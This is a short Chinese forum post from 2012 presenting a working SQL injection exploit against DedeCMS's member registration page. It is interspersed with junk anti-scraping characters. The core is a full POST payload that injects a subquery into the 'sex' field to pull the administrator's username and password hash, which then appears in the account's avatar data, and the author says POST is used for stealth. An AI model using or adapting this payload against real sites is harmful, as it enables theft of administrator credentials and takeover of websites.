dedecms版本 20121122
1 p0 M$ n! W9 f8 F- H
& O4 \, B+ v0 ]$ C" J. L需要magic_quotes_gpc=Off/ e) @, O6 \+ ]2 y
$ C! m$ r4 W' Z; S! d应该是没有什么大危害的漏洞.
) T4 g) j n0 K. V7 R. ~! J5 _( l: [原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.- Y4 ?& m7 G( k9 s
. P* f S( W' ]( B$ {是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.% Q+ k7 v) u2 j0 ^/ S5 N5 G
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
/ ?4 _6 y! G2 B* C$ Z" U0 L* c0 y* T$ L) H% F* N$ P9 ~/ D2 p( E
http:///de/member/reg_new.php! V, T( J+ y9 F2 a8 z
4 r; x/ \; D0 ^" C8 e
POST5 i' i# q {, F! B! J# y/ C
0 r, _) c+ f4 j! f6 g
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
. G6 m3 v7 ~* p: m: Z0 u( h
' w5 F9 Y0 H! O1 B0 Z! {* [) F$ j成功注册后,头像处里面有好玩的信息.
( j1 z4 G% S) z( U% U8 T: y3 c
K! H+ u6 {5 d) x7 p |
发表于 2012-12-5 10:03:32
收藏
支持
反对